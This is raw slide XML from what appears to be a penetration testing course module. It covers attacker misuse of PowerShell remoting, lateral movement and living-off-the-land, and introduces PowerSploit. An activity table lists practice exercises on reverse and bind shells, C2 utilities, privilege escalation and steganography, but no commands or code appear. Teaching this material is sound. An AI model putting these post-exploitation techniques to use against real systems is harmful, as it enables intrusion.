            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="181A1F"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Cisco Sans"/>
              <a:cs typeface="Cisco Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Cisco Sans"/>
                <a:cs typeface="Cisco Sans"/>
              </a:rPr>
              <a:t>Remote management in Windows via PowerShell (often called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Cisco Sans"/>
                <a:cs typeface="Cisco Sans"/>
              </a:rPr>
              <a:t>PowerShell [PS] remoting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Cisco Sans"/>
                <a:cs typeface="Cisco Sans"/>
              </a:rPr>
              <a:t> ) is a basic feature that a system administrator can use to access and manage a system remotely. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Cisco Sans"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="181A1F"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Cisco Sans"/>
              <a:cs typeface="Cisco Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Cisco Sans"/>
                <a:cs typeface="Cisco Sans"/>
              </a:rPr>
              <a:t>An attacker could also take advantage of this feature to perform post-exploitation activities.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="140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dirty="0"/>
              <a:t>39</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2730901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457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="024C69"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Module </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="024C69"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>: Activities</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7188AF34-F17D-65FE-91B6-733B90851DC8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="116793" y="460408"/>
            <a:ext cx="8695135" cy="34841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30000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>What activities are associated with this module?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="Table 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40064EF4-EE2B-342C-EA9E-699582F380FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="870783832"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="116602" y="1051140"/>
          <a:ext cx="8746740" cy="2225039"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1083071">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="314965042"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1539812">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1540795028"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4403911">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2968452238"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1719946">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="286226043"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="370839">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Page #</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Activity</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Activity Name</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Optional?</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="317262977"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr" fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>8.1.3</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="6350" marR="6350" marT="6350" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Practice</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="6350" marR="6350" marT="6350" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Practice – Reverse and Bind Shells</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Arial"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="6350" marR="6350" marT="6350" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Recommended</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2377890904"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr" fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>8.1.5</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="6350" marR="6350" marT="6350" marB="0" anchor="ct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000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Practice</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="6350" marR="6350" marT="6350" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Practice – Types of C2 Utilities</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="6350" marR="6350" marT="6350" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Recommended</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2281025351"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr" fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>8.2.4</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="6350" marR="6350" marT="6350" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Practice</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="6350" marR="6350" marT="6350" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Practice – Post Exploitation</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Arial"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="6350" marR="6350" marT="6350" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Recommended</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2217849980"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr" fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>8.2.6</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="6350" marR="6350" marT="6350" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Practice</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="6350" marR="6350" marT="6350" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Practice – Post Exploitation Privilege Escalation</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Arial"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="6350" marR="6350" marT="6350" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Recommended</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2496010669"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr" fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>8.2.8</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="6350" marR="6350" marT="6350" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Practice</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="6350" marR="6350" marT="6350" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Practice - Steganography</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Arial"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="6350" marR="6350" marT="6350" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Recommended</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1415166879"/>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4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30940663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Understanding How to Perform Lateral Movement, Detection Avoidance, and Enumeration</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 0"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="100" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="274320"/>
            <a:ext cx="9144000" cy="386033"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Legitimate Utilities and Living-off-the-Land (Cont.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="CaixaDeTexto 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10359F8A-B56A-3EB2-6C83-FB7410B44542}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2311" y="808212"/>
            <a:ext cx="915067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err="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>PowerSploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="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A collection of PowerShell modules that can be used for post-exploitation and other assessment phases. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="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The following table lists the most popular </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" err="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>PowerSploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> modules and scripts. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="7" name="Tabela 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD3392BF-586B-1BAC-FBDC-29EF951C7768}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4208963334"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="140179" y="1552755"/>
          <a:ext cx="8835551" cy="3476896"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
